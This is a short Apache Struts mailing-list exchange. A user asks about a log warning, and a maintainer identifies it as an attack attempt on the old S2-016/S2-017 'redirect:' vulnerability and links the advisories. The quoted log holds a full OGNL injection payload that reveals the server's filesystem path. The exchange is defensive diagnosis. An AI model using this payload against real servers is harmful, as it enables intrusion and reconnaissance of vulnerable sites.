czw., 25 mar 2021 o 11:12 Greg Huber <gregh3...@gmail.com> napisał(a): > > Seem to be getting lots of these log warnings recently. Anything to > worry about? > > 2021-03-24 12:29:40,439 WARN > com.opensymphony.xwork2.interceptor.ParametersInterceptor > ParametersInterceptor:isWithinLengthLimit - Parameter > [redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("xfdir"),#res.getWriter().print("xfdir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().print("xfdir:"),#res.getWriter().flush(),#res.getWriter().close()}] > is too long, allowed length is [100]
Rather no (if you are up to date), someone is trying to hack your website using an old vulnerability with "redirect:": https://cwiki.apache.org/confluence/display/WW/S2-016 https://cwiki.apache.org/confluence/display/WW/S2-017 Regards -- Łukasz + 48 606 323 122 http://www.lenart.org.pl/ --------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org For additional commands, e-mail: dev-h...@struts.apache.org